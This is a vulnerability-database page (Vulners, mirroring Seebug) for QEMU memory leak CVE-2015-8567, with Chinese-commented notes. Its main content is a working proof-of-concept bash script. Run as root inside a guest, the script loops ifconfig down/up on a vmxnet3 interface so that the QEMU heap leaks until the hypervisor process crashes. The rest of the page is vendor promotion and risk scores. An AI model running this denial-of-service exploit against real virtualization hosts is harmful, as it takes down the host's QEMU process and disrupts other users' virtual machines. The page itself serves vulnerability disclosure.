Lucene search
K

qemu内存泄露漏洞(CVE-2015-8567)

🗓️ 09 Jan 2016 00:00:00Reported by OopohhType 
seebug
 seebug
🔗 www.seebug.org👁 74 Views

QEMU内存泄露漏洞(CVE-2015-8567) - 简单漏洞利用脚

Related
Code

                                                #!/bin/bash
#这可能是最简单的exp吧...
#原理很简单,根据详情分析,发现重新启动网卡就会调用vmxnet3_activate_device
#然后堆就不停的分配内存
#直到进程漰溃
#这是一段bash shell脚本
#eth1是我这里虚拟机上的vmxnet3设备
#从开始运行直到漰溃用了我一個午觉时间,大概40分钟
#其实具体情况按照自己本机机器来定,时间长短不一
#root权限执行
while true
do
ifconfig eth1 down && echo 'Down!'
ifconfig eth1 up && echo 'Up!'
done
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jan 2016 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.05557
74